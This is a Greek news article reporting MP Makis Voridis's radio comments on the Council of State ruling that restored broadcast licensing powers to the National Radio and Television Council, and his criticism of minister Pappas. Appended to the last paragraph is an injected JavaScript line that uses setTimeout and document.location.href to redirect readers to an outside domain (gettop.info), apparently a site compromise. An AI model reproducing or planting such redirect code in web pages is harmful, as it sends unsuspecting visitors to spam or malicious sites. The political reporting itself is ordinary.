Βορίδης: Η ΝΔ θα σπεύσει στη συγκρότηση του ΕΣΡ, μόλις ο Παππάς επιστρέψει τις αρμοδιότητες στο Συμβούλιο

0
11

 

Αναμενόμενη η απόφαση του ΣτΕ, είπε ο Μάκης Βορίδης, συμπληρώνοντας ότι ήταν αρκετά σαφές ότι το ζήτημα της μεταφοράς αρμοδιοτήτων από το ΕΣΡ στη Γενική Γραμματεία, ήταν σε ευθεία σύγκρουση με τις συνταγματικές πρόνοιες.

Μιλώντας στον ραδιοφωνικό σταθμό του ΑΠΕ-ΜΠΕ, «Πρακτορείο 104,9 Fm», ο βουλευτής της ΝΔ τόνισε ότι: «η τηλεόραση δεν είναι ένα ζήτημα επιχειρηματικό, αλλά είναι κάτι που άπτεται της πληροφόρησης και της ενημέρωσης του ελληνικού λαού, των πολιτών, όλη αυτή η διαδικασία, έχει προβλέψει ο νομοθέτης, να είναι απο-πολιτικοποιημένη. Να φεύγει από τα χέρια της κυβέρνησης, η οποία, κακά τα ψέματα, έχει πολιτικές στοχεύσεις».

«Όταν το αφαιρείς αυτό (την αρμοδιότητα) από το Ραδιοτηλεοπτικό Συμβούλιο και το πηγαίνεις, σε μια κυβερνητική υπηρεσία, όπως η Γενική Γραμματεία, στην πραγματικότητα προσβάλει αυτή την επιταγή του Συντάγματος», υπογράμμισε ο κ. Βορίδης.

«Υπάρχει μια ανησυχία, ότι η πολιτικοποίηση αυτή στην πραγματικότητα θα οδηγήσει σε φαλκίδευση του δικαιώματος στον πλουραλισμό, στην πολυφωνία και στην αντικειμενική ενημέρωση» είπε ο βουλευτής της ΝΔ.

«Άκουσα τις δηλώσεις της κυβέρνησης, δια στόματος της κ. Γεροβασίλη, η οποία ουσιαστικά, τι γύρισε και είπε; Ότι το ΣτΕ, δηλαδή το Συνταγματικό Δικαστήριο, είναι συντεταγμένο…(αντισυνταγματικό έκρινε το νόμο η συντριπτική πλειοψηφία των δικαστών), και ακούω τώρα διατυπώσεις, συμπαρατάσσουν το Συμβούλιο με τα συμφέροντα της αντίδρασης, της διαπλοκής; Τι είδους δηλώσεις είναι αυτές από μια κυβέρνηση η οποία σέβεται τη διάκριση και τις αρμοδιότητες των εξουσιών;» αναρωτήθηκε.

«Το ΣτΕ είπε ότι δεν μπορεί η κυβέρνηση να αδειοδοτεί. Τι δεν κατάλαβε ο κ. Παππάς;» τόνισε ο κ. Βορίδης αναφορικά με τη νομοθετική ρύθμιση που ετοιμάζει ο υπουργός Επικρατείας, για την προσωρινή άδεια λειτουργίας των καναλιών.
Όπως είπε ο βουλευτής της ΝΔ, μόλις επιστρέψουν οι αρμοδιότητες στο Συμβούλιο, τις οποίες αφαίρεσε ο κ. Παππάς, η αξιωματική αντιπολίτευση θα προσέλθει στο διάλογο για τη συγκρότηση του ΕΣΡ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here